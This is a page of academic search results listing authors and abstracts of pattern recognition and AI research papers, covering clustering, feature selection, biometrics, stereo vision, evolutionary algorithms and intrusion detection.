Showing 1 to 100 of 1641 matching Articles
Results per page:
Export (CSV)
By
MoralesLuna, Guillermo
Post to Citeulike
1 Citations
We use a simple epistemic logic to pose problems related to relational database design. We use the notion of attribute dependencies, which is weaker than the notion of functional dependencies, to perform design tasks since it satisfies Armstrong axioms. We discuss also the application of the simple epistemic logic to privacy protection and to statistical disclosure.
more …
By
Hannachi, Mohamed Amine; Bouassida Rodriguez, Ismael; Drira, Khalil; Pomares Hernandez, Saul Eduardo
Show all (4)
Post to Citeulike
2 Citations
Multilabelled graphs are a powerful and versatile tool for modelling real applications in diverse domains such as communication networks, social networks, and autonomic systems, among others. Due to dynamic nature of such kind of systems the structure of entities is continuously changing along the time, this because, it is possible that new entities join the system, some of them leave it or simply because the entities’ relations change. Here is where graph transformation takes an important role in order to model systems with dynamic and/or evolutive configurations. Graph transformation consists of two main tasks: graph matching and graph rewriting. At present, few graph transformation tools support multilabelled graphs. To our knowledge, there is no tool that support inexact graph matching for the purpose of graph transformation. Also, the main problem of these tools lies on the limited expressiveness of rewriting rules used, that negatively reduces the range of application scenarios to be modelling and/or negatively increase the number of rewriting rules to be used. In this paper, we present the tool GMTE  Graph Matching and Transformation Engine. GMTE handles directed and multilabelled graphs. In addition, to the exact graph matching, GMTE handles the inexact graph matching. The approach of rewriting rules used by GMTE combines Single PushOut rewriting rules with edNCE grammar. This combination enriches and extends the expressiveness of the graph rewriting rules. In addition, for the graph matching, GMTE uses a conditional rule schemata that supports complex comparison functions over labels. To our knowledge, GMTE is the first graph transformation tool that offers such capabilities.
more …
By
Ita, Guillermo; Bello, Pedro; Contreras, Meliza
Post to Citeulike
To count models for two conjunctive forms (#2SAT problem) is a classic #P problem. We determine different structural patterns on the underlying graph of a 2CF F allowing the efficient computation of #2SAT(F).
We show that if the constrained graph of a formula is acyclic or the cycles on the graph can be arranged as independent and embedded cycles, then the number of models of F can be counted efficiently.
more …
By
AlbaCabrera, Eduardo; IbarraFiallo, Julio; GodoyCalderon, Salvador; CervantesAlonso, Fernando
Show all (4)
Post to Citeulike
1 Citations
The last few years have seen an important increase in research publications dealing with external typical testorfinding algorithms, while internal ones have been almost forgotten or modified to behave as external on the basis of their alleged poor performance. In this research we present a new internal typical testorfinding algorithm called YYC that incrementally calculates typical testors for the currently analized set of basic matrix rows by searching for compatible sets. The experimentally measured performance of this algorithm stands out favorably in problems where other external algorithms show very low performance. Also, a comparative analysis of its efficiency is done against some external typical testorfinding algorithms published during the last few years.
more …
By
Rendón, Erendira; Sánchez, José Salvador
Post to Citeulike
2 Citations
Clustering in data mining is a discovery process that groups a set of data so as to maximize the intracluster similarity and to minimize the intercluster similarity. Clustering becomes more challenging when data are categorical and the amount of available memory is less than the size of the data set. In this paper, we introduce CBC (Clustering Based on Compressed Data), an extension of the Birch algorithm whose main characteristics refer to the fact that it can be especially suitable for very large databases and it can work both with categorical attributes and mixed features. Effectiveness and performance of the CBC procedure were compared with those of the wellknown Kmodes clustering algorithm, demonstrating that the CBC summary process does not affect the final clustering, while execution times can be drastically lessened.
more …
By
García, Vicente; Mollineda, Ramón A.; Sánchez, J. Salvador
Post to Citeulike
2 Citations
In this paper, we introduce a new approach to evaluate and visualize the classifier performance in twoclass imbalanced domains. This method defines a twodimensional space by combining the geometric mean of class accuracies and a new metric that gives an indication of how balanced they are. A given point in this space represents a certain tradeoff between those two measures, which will be expressed as a trapezoidal function. Besides, this evaluation function has the interesting property that it allows to emphasize the correct predictions on the minority class, which is often considered as the most important class. Experiments demonstrate the consistency and validity of the evaluation method here proposed.
more …
By
Quintana, Ma. Guadalupe; Morales, Rafael
Post to Citeulike
We present results of using inductive logic programming (ILP) to produce learner models by behavioural cloning. Models obtained using a program for supervised induction of production rules (ripper) are compared to models generated using a wellknown program for ILP (foil). It is shown that the models produced by foil are either too specific or too general, depending on whether or not auxiliary relations are applied. Three possible explanations for these results are: (1) there is no way of specifying to foil the minimum number of cases each clause must cover; (2) foil requires that all auxiliary relations be defined extensionally; and (3) the application domain (control of a pole on a cart) has continuous attributes. In spite of foil’s limitations, the models it produced using auxiliary relations meet one of the goals of our exploration: to obtain more structured learner models which are easier to comprehend.
more …
By
SolorioFernández, Saúl; CarrascoOchoa, J. Ariel; MartínezTrinidad, José Fco.
Post to Citeulike
4 Citations
In this paper, we introduce a new hybrid filterwrapper method for supervised feature selection, based on the Laplacian Score ranking combined with a wrapper strategy. We propose to rank features with the Laplacian Score to reduce the search space, and then we use this order to find the best feature subset. We compare our method against other based on ranking feature selection methods, namely, Information Gain Attribute Ranking, Relief, Correlationbased Feature Selection, and additionally we include in our comparison a Wrapper Subset Evaluation method. Empirical results over ten realworld datasets from the UCI repository show that our hybrid method is competitive and outperforms in most of the cases to the other feature selection methods used in our experiments.
more …
By
SantiagoRamirez, Everardo; GonzalezFraga, J. A.; AscencioLopez, J. I.
Post to Citeulike
2 Citations
In this paper, we compare the performance of three composite correlation filters in facial recognition problem. We used the ORL (Olivetti Research Laboratory) facial image database to evaluate KLaw, MACE and ASEF filters performance. Simulations results demonstrate that KLaw nonlinear composite filters evidence the best performance in terms of recognition rate (RR) and, false acceptation rate (FAR). As a result, we observe that correlation filters are able to work well even when the facial image contains distortions such as rotation, partial occlusion and different illumination conditions.
more …
By
Acevedo, Elena; Acevedo, Antonio; Felipe, Federico
Post to Citeulike
2 Citations
A method for diagnosing Parkinson’s disease is presented. The proposal is based on associative approach, and we used this method for classifying patients with Parkinson’s disease and those who are completely healthy. In particular, AlphaBeta Bidirectional Associative Memory is used together with the modified JohnsonMöbius codification in order to deal with mixed noise. We use three methods for testing the performance of our method: LeaveOneOut, HoldOut and Kfold Cross Validation and the average obtained was of 97.17%.
more …
By
CruzBarbosa, Raúl; BautistaVillavicencio, David; Vellido, Alfredo
Post to Citeulike
The diagnostic classification of human brain tumours on the basis of magnetic resonance spectra is a nontrivial problem in which dimensionality reduction is almost mandatory. This may take the form of feature selection or feature extraction. In feature extraction using manifold learning models, multivariate data are described through a lowdimensional manifold embedded in data space. Similarities between points along this manifold are best expressed as geodesic distances or their approximations. These approximations can be computationally intensive, and several alternative software implementations have been recently compared in terms of computation times. The current brief paper extends this research to investigate the comparative ability of dimensionalityreduced data descriptions to accurately classify several types of human brain tumours. The results suggest that the way in which the underlying data manifold is constructed in nonlinear dimensionality reduction methods strongly influences the classification results.
more …
By
PérezAlfonso, Damián; FundoraRamírez, Osiel; LazoCortés, Manuel S.; RocheEscobar, Raciel
Show all (4)
Post to Citeulike
Process mining is concerned with the extraction of knowledge about business processes from information system logs. Process discovery algorithms are process mining techniques focused on discovering process models starting from event logs. The applicability and effectiveness of process discovery algorithms rely on features of event logs and process characteristics. Selecting a suitable algorithm for an event log is a tough task due to the variety of variables involved in this process. The traditional approaches use empirical assessment in order to recommend a suitable discovery algorithm. This is a time consuming and computationally expensive approach. The present paper evaluates the usefulness of an approach based on classification to recommend discovery algorithms. A knowledge base was constructed, based on features of event logs and process characteristics, in order to train the classifiers. Experimental results obtained with the classifiers evidence the usefulness of the proposal for recommendation of discovery algorithms.
more …
By
Ledeneva, Yulia
Post to Citeulike
The task of extractive summarization consists in producing a text summary by extracting a subset of text segments, such as sentences, and concatenating them to form a summary of the original text. The selection of sentences is based on terms they contain, which can be single words or multiword expressions. In a previous work, we have suggested socalled Maximal Frequent Sequences as such terms. In this paper, we investigate the effect of preprocessing on the process of selecting such sequences. Our results suggest that the accuracy of the method is, contrary to expectations, not seriously affected by preprocessing—which is both bad and good news, as we show.
more …
By
GarcíaHernández, René Arnulfo; Ledeneva, Yulia
Post to Citeulike
4 Citations
Extractive text summarization consists in selecting the most important units (normally sentences) from the original text, but it must be done as closer as humans do. Several interesting automatic approaches are proposed for this task, but some of them are focused on getting a better result rather than giving some assumptions about what humans use when producing a summary. In this research, not only the competitive results are obtained but also some assumptions are given about what humans tried to represent in a summary. To reach this objective a genetic algorithm is proposed with special emphasis on the fitness function which permits to contribute with some conclusions.
more …
By
VillatoroTello, Esaú; VillaseñorPineda, Luis; MontesyGómez, Manuel
Post to Citeulike
1 Citations
Recent evaluation results from Geographic Information Retrieval (GIR) indicate that current information retrieval methods are effective to retrieve relevant documents for geographic queries, but they have severe difficulties to generate a pertinent ranking of them. Motivated by these results in this paper we present a novel reranking method, which employs information obtained through a relevance feedback process to perform a ranking refinement. Performed experiments show that the proposed method allows to improve the generated ranking from a traditional IR machine, as well as results from traditional reranking strategies such as query expansion via relevance feedback.
more …
By
Coello Coello, Carlos A.
Post to Citeulike
3 Citations
This paper provides a brief introduction to the socalled multiobjective evolutionary algorithms, which are bioinspired metaheuristics designed to deal with problems having two or more (normally conflicting) objectives. First, we provide some basic concepts related to multiobjective optimization and a brief review of approaches available in the specialized literature. Then, we provide a short review of applications of multiobjective evolutionary algorithms in pattern recognition. In the final part of the paper, we provide some possible paths for future research in this area, which are promising, from the author’s perspective.
more …
By
Gelbukh, Alexander; Sidorov, Grigori
Post to Citeulike
1 Citations
Parallel text alignment is a special type of pattern recognition task aimed to discover the similarity between two sequences of symbols. Given the same text in two different languages, the task is to decide which elements—paragraphs in case of paragraph alignment—in one text are translations of which elements of the other text. One of the applications is training training statistical machine translation algorithms. The task is not trivial unless detailed text understanding can be afforded. In our previous work we have presented a simple technique that relied on bilingual dictionaries but does not perform any syntactic analysis of the texts. In this paper we give a formal definition of the task and present an exact optimization algorithm for finding the best alignment.
more …
By
Peña Ayala, Alejandro; Sossa, Humbero
Post to Citeulike
In this paper an approach oriented to acquire, depict, and administrate knowledge about the student is proposed. Moreover, content is also characterized to describe lectures. In addition, the work focuses on the semantics of the attributes that reveal a profile of the student and the teaching experiences. The meaning of such properties is stated as an ontology. Thus, inheritance and causal inferences are made. According to the semantics of the attributes and the conclusions induced, the sequencing module of a Webbased educational system (WBES) delivers the appropriate option of lecture to students. The underlying hypothesis is: the apprenticeship of students is enhanced when a WBES understands the nature of the content and the student’s characteristics. Based on the empirical evidence outcome by a trial, it is concluded that: Successful WBES account the knowledge that describe their students and lectures.
more …
By
López, Juan Carlos; Monroy, Raúl
Post to Citeulike
The inductive approach [1] has been successfully used for verifying a number of security protocols, uncovering hidden assumptions. Yet it requires a high level of skill to use: a user must guide the proof process, selecting the tactic to be applied, inventing a key lemma, etc. This paper suggests that a proof planning approach [2] can provide automation in the verification of security protocols using the inductive approach. Proof planning uses AI techniques to guide theorem provers. It has been successfully applied in formal methods to software development. Using inductive proof planning [3], we have written a method which takes advantage of the differences in term structure introduced by rule induction, a chief inference rule in the inductive approach. Using difference matching [4], our method first identifies the differences between a goal and the associated hypotheses. Then, using rippling [5], the method attempts to remove such differences. We have successfully conducted a number of experiments using HOLClam [6], a socketbased link that combines the HOL theorem prover [7] and the Clam proof planner [8]. While this paper key’s contribution centres around a new insight to structuring the proof of some security theorems, it also reports on the development of the inductive approach within the HOL system.
more …
By
Pérez, Cynthia B.; Olague, Gustavo; Fernandez, Francisco; Lutton, Evelyne
Show all (4)
Post to Citeulike
2 Citations
This work presents an evolutionary approach to improve the infection algorithm to solve the problem of dense stereo matching. Dense stereo matching is used for 3D reconstruction in stereo vision in order to achieve fine texture detail about a scene. The algorithm presented in this paper incorporates two different epidemic automata applied to the correspondence of two images. These two epidemic automata provide two different behaviours which construct a different matching. Our aim is to provide with a new strategy inspired on evolutionary computation, which combines the behaviours of both automata into a single correspondence process. The new algorithm will decide which epidemic automata to use based on inheritance and mutation, as well as the attributes, texture and geometry, of the input images. Finally, we show experiments in a real stereo pair to show how the new algorithm works.
more …
By
Ritter, Gerhard X.; Urcid, Gonzalo
Post to Citeulike
This paper presents an overview of the current status of lattice based dendritic computing. Roughly speaking, lattice based dendritic computing refers to a biomimetic approach to artificial neural networks whose computational aspects are based on lattice group operations. We begin our presentation by discussing some important processes of biological neurons followed by a biomimetic model which implements these processes. We discuss the reasons and rationale behind this approach and illustrate the methodology with some examples. Global activities in this field as well as some potential research issues are also part of this discussion.
more …
By
OlveraLópez, J. Arturo; MartínezTrinidad, J. Francisco; CarrascoOchoa, J. Ariel
Post to Citeulike
3 Citations
The object selection is an important task for instancebased classifiers since through this process the size of a training set could be reduced and then the runtimes in both classification and training steps would be reduced. Several methods for object selection have been proposed but some methods discard relevant objects for the classification step. In this paper, we propose an object selection method which is based on the idea of sequential floating search. This method reconsiders the inclusion of relevant objects previously discarded. Some experimental results obtained by our method are shown and compared against some other object selection methods.
more …
By
Posadas, Román; MexPerera, Carlos; Monroy, Raúl; NolazcoFlores, Juan
Show all (4)
Post to Citeulike
6 Citations
This paper focuses on the study of a new method for detecting masqueraders in computer systems. The main feature of such masqueraders is that they have knowledge about the behavior profile of legitimate users. The dataset provided by Schonlau et al. [1], called SEA, has been modified for including synthetic sessions created by masqueraders using the behavior profile of the users intended to impersonate. It is proposed an hybrid method for detection of masqueraders based on the compression of the users sessions and Hidden Markov Models. The performance of the proposed method is evaluated using ROC curves and compared against other known methods. As shown by our experimental results, the proposed detection mechanism is the best of the methods here considered.
more …
By
Oca, Víctor Montes; Torres, Miguel; Levachkine, Serguei; Moreno, Marco
Show all (4)
Post to Citeulike
In this paper, we propose the use of a knowledge based system, which has been implemented in SWIProlog to approach the automatic description of spatial data by means of some logic rules. The process to establish the predicates is based on the topological and geometrical analysis of spatial data. These predicates are handled by a set of rules, which are used to find the relations between geospatial objects. Moreover, the rules aid the searching of several features that compose the partition of topographic maps. For instance, in the case that any road intersects with other, we appreciate that a connection relation exists between different destinies, which can be accessed by these roads. Furthermore, the rules help us to know each possible access for this case. Therefore, this description assists in the tasks of geospatial data interpretation (map description) in order to provide quality information for spatial decision support systems.
more …
By
Gutiérrez, Francisco J.; LermaRascón, Margarita M.; SalgadoGarza, Luis R.; Cantú, Francisco J.
Show all (4)
Post to Citeulike
3 Citations
Biometrics is the field that differentiates among various people based on their unique biological and physiological patterns such as retina, finger prints, DNA and keyboard typing patterns to name a few. Keystroke Dynamics is a physiological biometric that measures the unique typing rhythm and cadence of a computer keyboard user. This paper presents a Data Miningbased Keystroke Dynamics application for identity verification, and it reports the results of experiments comparing different approaches to Keystroke Dynamics. The methods compared were Decision Trees, a Naïve Bayesian Classifier, Memory Based Learning, and statisticsbased Keystroke Dynamics.
more …
By
Batyrshin, Ildar; Solovyev, Valery
Post to Citeulike
2 Citations
The paper introduces new time series shape association measures based on Euclidean distance. The method of analysis of associations between time series based on separate analysis of positively and negatively associated local trends is discussed. The examples of application of the proposed measures and methods to analysis of associations between historical prices of securities obtained from Google Finance are considered. An example of time series with inverse associations between them is discussed.
more …
By
AguilarGonzález, Pablo M.; Kober, Vitaly
Post to Citeulike
1 Citations
Correlation filters for object detection and location estimation are commonly designed assuming the shape and graylevel structure of the object of interest are explicitly available. In this work we propose the design of correlation filters when the appearance of the target is given in a single training image. The target is assumed to be embedded in a cluttered background and the image is assumed to be corrupted by additive sensor noise. The designed filters are used to detect the target in an input scene modeled by the nonoverlapping signal model. An optimal correlation filter, with respect to the peaktooutput energy ratio criterion, is proposed for object detection and location estimation. We also present estimation techniques for the required parameters. Computer simulation results obtained with the proposed filters are presented and compared with those of common correlation filters.
more …
By
HernándezRodríguez, Selene; CarrascoOchoa, J. A.; MartínezTrinidad, J. Fco.
Post to Citeulike
The k nearest neighbor (kNN) classifier has been extensively used as a nonparametric technique in Pattern Recognition. However, in some applications where the training set is large, the exhaustive kNN classifier becomes impractical. Therefore, many fast kNN classifiers have been developed to avoid this problem. Most of these classifiers rely on metric properties, usually the triangle inequality, to reduce the number of prototype comparisons. However, in soft sciences, the prototypes are usually described by qualitative and quantitative features (mixed data), and sometimes the comparison function does not satisfy the triangle inequality. Therefore, in this work, a fast k most similar neighbor (kMSN) classifier, which uses a Tree structure and an Approximating and Eliminating approach for Mixed Data, not based on metric properties (Tree AEMD), is introduced. The proposed classifier is compared against other fast kNN classifiers.
more …
By
KuriMorales, Angel; CortésArce, Iván
Post to Citeulike
Computer Networks are usually balanced appealing to personal experience and heuristics, without taking advantage of the behavioral patterns embedded in their operation. In this work we report the application of tools of computational intelligence to find such patterns and take advantage of them to improve the network’s performance. The traditional traffic flow for Computer Network is improved by the concatenated use of the following “tools”: a) Applying intelligent agents, b) Forecasting the traffic flow of the network via MultiLayer Perceptrons (MLP) and c) Optimizing the forecasted network’s parameters with a genetic algorithm. We discuss the implementation and experimentally show that every consecutive new tool introduced improves the behavior of the network. This incremental improvement can be explained from the characterization of the network’s dynamics as a set of emerging patterns in time.
more …
By
RosalesPérez, Alejandro; ReyesGarcía, Carlos A.; Gonzalez, Jesus A.; ArchTirado, Emilio
Show all (4)
Post to Citeulike
3 Citations
In the last years, infant cry recognition has been of particular interest because it contains useful information to determine if the infant is hungry, has pain, or a particular disease. Several studies have been performed in order to differentiate between these kinds of cries. In this work, we propose to use Genetic Selection of a Fuzzy Model (GSFM) for classification of infant cry. GSFM selects a combination of feature selection methods, type of fuzzy processing, learning algorithm, and its associated parameters that best fit to the data. The experiments demonstrate the feasibility of this technique in the classification task. Our experimental results reach up to 99.42% accuracy.
more …
By
GómezSoriano, José Manuel; MontesyGómez, Manuel; SanchisArnal, Emilio; VillaseñorPineda, Luis; Rosso, Paolo
Show all (5)
Post to Citeulike
3 Citations
Passage Retrieval (PR) is typically used as the first step in current Question Answering (QA) systems. Most methods are based on the vector space model allowing the finding of relevant passages for general user needs, but failing on selecting pertinent passages for specific user questions. This paper describes a simple PR method specially suited for the QA task. This method considers the structure of the question, favoring the passages that contain the longer ngram structures from the question. Experimental results of this method on Spanish, French and Italian show that this approach can be useful for multilingual question answering systems.
more …
By
Escalera, Sergio; Baró, Xavier; Gonzàlez, Jordi; Bautista, Miguel A.; Madadi, Meysam; Reyes, Miguel; PonceLópez, Víctor; Escalante, Hugo J.; Shotton, Jamie; Guyon, Isabelle
Show all (10)
Post to Citeulike
13 Citations
This paper summarizes the ChaLearn Looking at People 2014 challenge data and the results obtained by the participants. The competition was split into three independent tracks: human pose recovery from RGB data, action and interaction recognition from RGB data sequences, and multimodal gesture recognition from RGBDepth sequences. For all the tracks, the goal was to perform userindependent recognition in sequences of continuous images using the overlapping Jaccard index as the evaluation measure. In this edition of the ChaLearn challenge, two large novel data sets were made publicly available and the Microsoft Codalab platform were used to manage the competition. Outstanding results were achieved in the three challenge tracks, with accuracy results of 0.20, 0.50, and 0.85 for pose recovery, action/interaction recognition, and multimodal gesture recognition, respectively.
more …
By
CoelloCoello, Carlos A.
Post to Citeulike
In this paper, we provide a general introduction to the socalled multiobjective evolutionary algorithms, which are metaheuristic search techniques inspired on natural evolution that are able to deal with highly complex optimization problems having two or more objectives. In the first part of the paper, we provide some basic concepts necessary to make the paper selfcontained, as well as a short review of the most representative multiobjective evolutionary algorithms currently available in the specialized literature. After that, a short review of applications of these algorithms in pattern recognition is provided. The final part of the paper presents some possible future research paths in this area as well as our conclusions.
more …
By
OlmedoAguirre, José Oscar; Rosa, Mónica Rivera; MoralesLuna, Guillermo
Post to Citeulike
System modeling, analysis and visualization are becoming a common practice for the design of distributed intelligent systems since the wide adoption of the Unified Modeling Language (UML). However, UML cannot describe important behavioral properties such as context awareness as required for ubiquitous computing. In this paper, we present Context Aware UML Sequence diagrams (CA UMLS), an experimental visual programming language that extends UML sequence diagrams with data/ object spaces to represent computational context awareness. The programming language provides the means to describe the eventconditionaction (ECA) rules that govern complex nomadic user behavior and to visualize their effect. The ECA rules are compiled into common concurrent programming abstractions by introducing structuring notions of object creation, synchronization, and communication, along with sequential and selective composition of simpler rules. The contribution of this work is in providing programming abstractions that facilitate the design of contextaware applications for ubiquitous and nomadic computing.
more …
By
Sossa, Humberto; Garro, Beatriz A.; Villegas, Juan; Avilés, Carlos; Olague, Gustavo
Show all (5)
Post to Citeulike
In this note we present our most recent advances in the automatic design of artificial neural networks (ANNs) and associative memories (AMs) for pattern classification and pattern recall. Particle Swarm Optimization (PSO), Differential Evolution (DE), and Artificial Bee Colony (ABC) algorithms are used for ANNs; Genetic Programming is adopted for AMs. The derived ANNs and AMs are tested with several examples of wellknown databases. As we will show, results are very promising.
more …
By
Villalobos Castaldi, Fabiola M.; FelipeRiveron, Edgardo M.; Gómez, Ernesto Suaste
Post to Citeulike
The retinal vascular network has many desirable characteristics as a basis for authentication, including uniqueness, stability, and permanence. In this paper, a new approach for retinal images features extraction and template coding is proposed. The use of the logarithmic spiral sampling grid in scanning and tracking the vascular network is the key to make this new approach simple, flexible and reliable. Experiments show that this approach can achieve the reduction of data dimensionality and of the required time to obtain the biometric code of the vascular network in a retinal image. The performed experiments demonstrated that the proposed verification system has an average accuracy of 95.0 – 98 %.
more …
By
Suaste, Verónica; Caudillo, Diego; Shin, BokSuk; Klette, Reinhard
Show all (4)
Post to Citeulike
Thirdeye stereo analysis evaluation compares a virtual image, derived from results obtained by binocular stereo analysis, with a recorded image at the same pose. This technique is applied for evaluating stereo matchers on long (or continuous) stereo input sequences where no ground truth is available. The paper provides a critical and constructive discussion of this method. The paper also introduces data measures on input video sequences as an additional tool for analyzing issues of stereo matchers occurring for particular scenarios. The paper also reports on extensive experiments using two toprated stereo matchers.
more …
By
JiménezGuarneros, Magdiel; CarrascoOchoa, Jesús Ariel; MartínezTrinidad, José Fco.
Post to Citeulike
Currently, graph embedding has taken a great interest in the area of structural pattern recognition, especially techniques based on representation via dissimilarity. However, one of the main problems of this technique is the selection of a suitable set of prototype graphs that better describes the whole set of graphs. In this paper, we evaluate the use of an instance selection method based on clustering for graph embedding, which selects border prototypes and some nonborder prototypes. An experimental evaluation shows that the selected method gets competitive accuracy and better runtimes than other state of the art methods.
more …
By
Serrano, Juan Pablo; Hernández, Arturo; Herrera, Rafael
Post to Citeulike
1 Citations
We apply the HyperConic Artificial Multilayer Perceptron (HCMLP) to color image segmentation, where we consider image segmentation as a classification problem distinguishing between foreground and background pixels. The HCMLP was designed by using the conic space and conformal geometric algebra. The neurons in the hidden layer contain a transfer function that defines a quadratic surface (spheres, ellipsoids, paraboloids and hyperboloids) by means of inner and outer products, and the neurons in the output layer contain a transfer function that decides whether a point is inside or outside a sphere. The Particle Swarm Optimization algorithm (PSO) is used to train the HCMLP. A benchmark of fifty images is used to evaluate the performance of the algorithm and compare our proposal against statistical methods which use copula gaussian functions.
more …
By
Palacios, José Juan
Post to Citeulike
We describe our work in progress on μACL, a light implementation of the language ACL (A synchronous Communications in Linear Logic) for concurrent and distributed linear logic programming. Our description for computing elements (Agents) is inspired by the Actor model of concurrent computation. The essential requirements for Agent programming (communication, concurrency, actions, state update, modularity and code migration) are naturally expressed in μACL. Also, we describe some considerations towards the implementation of a distributed virtual machine for efficient execution of μACL programs.
more …
By
Alba, Alfonso; ArceSantana, Edgar
Post to Citeulike
1 Citations
In this paper, we propose a new theoretical framework, which is based on phasecorrelation, for efficiently solving the correspondence problem. The proposed method allows area matching algorithms to perform at high frame rates, and can be applied to various problems in computer vision. In particular, we demonstrate the advantages of this method in the estimation of dense disparity maps in real time. A fairly optimized version of the proposed algorithm, implemented on a dualcore PC architecture, is capable of running at 100 frames per second with an image size of 256 ×256.
more …
By
SanvicenteSánchez, Héctor; FraustoSolís, Juan
Post to Citeulike
2 Citations
The Methodology to Parallelize Simulated Annealing (MPSA) leads to massive parallelization by executing each temperature cycle of the Simulated Annealing (SA) algorithm in parallel. The initial solution for each internal cycle is set through a Monte Carlo random sampling to adjust the Boltzmann distribution at the cycle beginning. MPSA uses an asynchronous communication scheme and any implementation of MPSA leads to a parallel Simulated Annealing algorithm that is in general faster than its sequential implementation version while the precision is held. This paper illustrates the advantages of the MPSA scheme by parallelizing a SA algorithm for the Traveling Salesman Problem.
more …
By
Favela, Jesús; Alba, Manuel; Rodríguez, Marcela
Post to Citeulike
The proliferation of different computing devices such as handhelds and wallsize whiteboards, as well as Internetbased distributed information systems are creating ubiquitous computing environments that provide constant access to information regardless of the user’s location. Handheld computers are being transformed from personal electronic agendas into mobile communication devices with intermittent network connectivity. Thus, these devices are becoming a natural medium to tap into an ubiquitous computing infrastructure. Not only do they store much of the user’s personal information (contacts list, meeting schedule, todo list, etc.), but they are always at hand, in sharp contrast with desktop computers. Handhelds, however, most often operate disconnected from the network thus reducing the opportunities for computermediated collaboration with other peers or computational resources. In this paper we present an extension to the COMAL handheld collaborative development framework to support autonomous agents that can act on behalf of the user. We discuss scenarios that take advantage of such platform and the design decisions that were made to implement it. The use of the framework is illustrated with the development of an agent that recommends talks within a conference, based on the context and the user’s profile.
more …
By
LazoCortés, Manuel S.; MartínezTrinidad, José Francisco; CarrascoOchoa, Jesús Ariel
Post to Citeulike
1 Citations
In this article, we revisit the concept of Goldman’s fuzzy testor and restudy it from the perspective of the conceptual approach to attribute reduct introduced by Y.Y. Yao in the framework of Rough Set Theory. We reformulate the original concept of Goldman’s fuzzy testor and we introduce the Goldman’s fuzzy reducts. Additionally, in order to show the usefulness of the Goldman’s fuzzy reducts, we build a rule based classifier and evaluate its performance in a case of study.
more …
By
OrtizBayliss, José Carlos; TerashimaMarín, Hugo; ConantPablos, Santiago Enrique
Post to Citeulike
Hyperheuristics are methodologies that choose from a set of heuristics and decide which one to apply given some properties of the current instance. When solving a constraint satisfaction problem, the order in which the variables are selected to be instantiated has implications in the complexity of the search. In this paper we propose a logistic regression model to generate hyperheuristics for variable ordering within constraint satisfaction problems. The first step in our approach requires to generate a training set that maps any given instance, expressed in terms of some of their features, to one suitable variable ordering heuristic. This set is used later to train the system and generate a hyperheuristic that decides which heuristic to apply given the current features of the instances at hand at different steps of the search. The results suggest that hyperheuristics generated through this methodology allow us to exploit the strengths of the heuristics to minimize the cost of the search.
more …
By
Monroy, Raúl
Post to Citeulike
In the formal methods approach to software verification, we use logical formulae to model both the program and its intended specification, and, then, we apply (automated) reasoning techniques to demonstrate that the formulae satisfy a verification conjecture. One may either apply proving techniques, to provide a formal verification argument, or disproving techniques to falsify the verification conjecture. However, programs often contain bugs or are flawed, and, so, the verification process breaks down. Interpreting the failed proof attempt or the counterexample, if any, is very valuable, since it potentially helps identifying the program bug or flaw. Lakatos, in his book Proofs and Refutations, argues that the analysis of a failed proof often holds the key for the development of a theory. Proof analysis enables the strengthening of naïve conjectures and concepts, without severely weakening its content. In this paper, we survey our encounters on the productive use of failure in the context of a few theories, natural numbers and (higherorder) lists, and in the context of security protocols.
more …
By
Olague, Gustavo; Puente, Cesar
Post to Citeulike
9 Citations
This paper investigates the communication system of honeybees with the purpose of obtaining an intelligent approach for threedimensional reconstruction. A new framework is proposed in which the 3D points communicate between them to achieve an improved sparse reconstruction which could be used reliable in further visual computing tasks. The general ideas that explain the honeybee behavior are translated into a computational algorithm following the evolutionary computing paradigm. Experiments demonstrate the importance of the proposed communication system to reduce dramatically the number of outliers.
more …
By
GonzálezGómez, Efrén; Levachkine, Serguei
Post to Citeulike
Hard problem of cartographic pattern recognition in fine scale maps, using information that comes from coarse scale maps, is considered. The maps are rasterscanned color maps of different thematic, representing the same territory in coarse and fine scale respectively. A solution called CoarsetoFine Scale Method is proposed. This method is defined in terms of means: coarse scale maps and their information; concepts: image associated function, cartographic knowledge domain and cartographic pattern; and tools: a set of clustering criteria of the Logical Combinatorial Pattern Recognition.
more …
By
Gaxiola, Fernando; Melin, Patricia; Valdez, Fevrier; Castillo, Oscar
Show all (4)
Post to Citeulike
1 Citations
This paper presents a new modular neural network architecture that is used to build a system for pattern recognition based on the iris biometric measurement of persons. In this system, the properties of the person iris database are enhanced with image processing methods, and the coordinates of the center and radius of the iris are obtained to make a cut of the area of interest by removing the noise around the iris. The inputs to the modular neural network are the processed iris images and the output is the number of the identified person. The integration of the modules was done with a type2 fuzzy integrator at the level of the sub modules, and with a gating network at the level of the modules.
more …
By
Sánchez, Daniela; Melin, Patricia; Castillo, Oscar
Post to Citeulike
In this paper we propose a new model of a Modular Neural Network (MNN) with fuzzy integration based on granular computing. The topology and parameters of the model are optimized with a Hierarchical Genetic Algorithm (HGA). The model was applied to the case of human recognition to illustrate its applicability. The proposed method is able to divide the data automatically into sub modules, to work with a percentage of images and select which images will be used for training. We considered, to test this method, the problem of human recognition based on ear, and we used a database with 77 persons (with 4 images each person for this task).
more …
By
GarcíaVázquez, Mireya S.; GareaLlano, Eduardo; ColoresVargas, Juan M.; ZamudioFuentes, Luis M.; RamírezAcosta, Alejandro A.
Show all (5)
Post to Citeulike
Iris recognition is being widely used in different environments where the identity of a person is necessary. Therefore, it is a challenging problem to maintain high reliability and stability of this kind of systems in harsh environments. Iris segmentation is one of the most important process in iris recognition to preserve the abovementioned characteristics. Indeed, iris segmentation may compromise the performance of the entire system. This paper presents a comparative study of four segmentation algorithms in the frame of the high reliability iris verification system. These segmentation approaches are implemented, evaluated and compared based on their accuracy using three unconstraint databases, one of them is a video iris database. The result shows that, for an ultrahigh security system on verification at FAR = 0.01 %, segmentation 3 (Viterbi) presents the best results.
more …
By
Figueroa, Karina; Paredes, Rodrigo
Post to Citeulike
2 Citations
Proximity searching consists in retrieving objects out of a database similar to a given query. Nowadays, when multimedia databases are growing up, this is an elementary task. The permutation based index (PBI) and its variants are excellent techniques to solve proximity searching in high dimensional spaces, however they have been surmountable in low dimensional ones. Another PBI’s drawback is that the distance between permutations cannot allow to discard elements safely when solving similarity queries.
In the following, we introduce an improvement on the PBI that allows to produce a better promissory order using less space than the basic permutation technique and also gives us information to discard some elements. To do so, besides the permutations, we quantize distance information by defining distance rings around each permutant, and we also keep this data. The experimental evaluation shows we can dramatically improve upon specialized techniques in low dimensional spaces. For instance, in the real world dataset of NASA images, our boosted PBI uses up to 90 % less distances evaluations than AESA’s, the stateoftheart searching algorithm with the best performance in this particular space.
more …
By
LazoCortés, Manuel S.; MartínezTrinidad, José Fco.; CarrascoOchoa, J. A.
Post to Citeulike
